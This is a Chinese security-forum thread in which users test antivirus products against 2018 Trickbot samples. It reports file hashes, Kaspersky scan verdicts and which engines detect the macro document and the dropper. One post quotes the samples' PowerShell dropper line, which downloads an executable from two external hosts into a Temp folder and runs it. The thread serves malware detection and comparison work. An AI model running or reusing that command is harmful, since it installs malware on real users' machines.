一个

zdlzp

样本

火绒不认识

安全守护者

火绒 miss all

安全守护者

文件信息
文件名称：D:\VIRUS\样本\0704\2018-07-02-malware-and-artifact-from-Trickbot-infection\2018-07-02-Trickbot-malware-binary.exe
文件大小：
388 Kb
内部名称：
GraphMasterPlus
文件签名：
无文件签名信息
文件描述：
是一个木马
文件MD5：
3d1958a4ce83ca967dc4318ef2fba83b

pal家族

卡巴

Infected - 2
2018-07-02-attached-Wor...ith-macro-for-Trickbot.doc
Scan result File is infected Detected threats HEUR:Trojan.Script.Agent.gen File size 84.50 KB File type OLE2/DOCUMENT Scan date Jul 04 2018 11:47:57 Databases release date Jul 04 2018 03:34:29 UTC MD5 b43124290e1696f57a898245c48332dc SHA1 47cee41fee793e862b962c0ad018e1cd57e16463 SHA256 99e5d62bf30a17c4ce8ba5720573338a4cb26863d17a0f61e370618fc5e75adf
2018-07-02-Trickbot-malware-binary.exe
Scan result File is infected Detected threats Trojan-Dropper.Win32.VB.dsmp File size 388.00 KB File type PE32/EXE Scan date Jul 04 2018 11:47:57 Databases release date Jul 04 2018 03:34:29 UTC MD5 3d1958a4ce83ca967dc4318ef2fba83b SHA1 880f59575415c7c43f0c138b85cc583c24beb046 SHA256 c2438bf316d3221fc2fbefd2a7811979005d30d09f2f3e9c09247199fc16f417
Safe - 1
2018-07-02-Trickbot-artifact-gudisb.bat.txt
Scan result File is safe File size 318 bytes File type TXT Scan date Jul 04 2018 11:47:57 Databases release date Jul 04 2018 03:34:29 UTC MD5 1d08a87b4b12c04ade359bc3f004be09 SHA1 9f37bd43a9d974e7e82e7328a5da9c368f8cef4f SHA256 552c1858ed76ccf2acba5faa1073fe66ff35ff16c4cc5648ea45f65581f32349

dreams521

上午9点前就被人上报了

sololpchina

非常可疑

ELOHIM

sololpchina 发表于 2018-7-4 13:02
非常可疑

scep 解压剩下一个txt

powershell "function ikyloum([string] $qgrhrd){(new-object system.net.webclient).downloadfile($qgrhrd,'C:\Users\EARL~1.BAN\AppData\Local\Temp\mxxbgh.exe');start-process 'C:\Users\EARL~1.BAN\AppData\Local\Temp\mxxbgh.exe';}try{ikyloum('http://25kstartups.com/sec.bin')}catch{ikyloum('http://winandgo-dz.com/sec.bin')}

cloud01

eset  7月3日  20点库杀

swizzer

360kill，双击无明显行为，MD仅提示创建文件

独赢缠身

小a杀了只剩下文档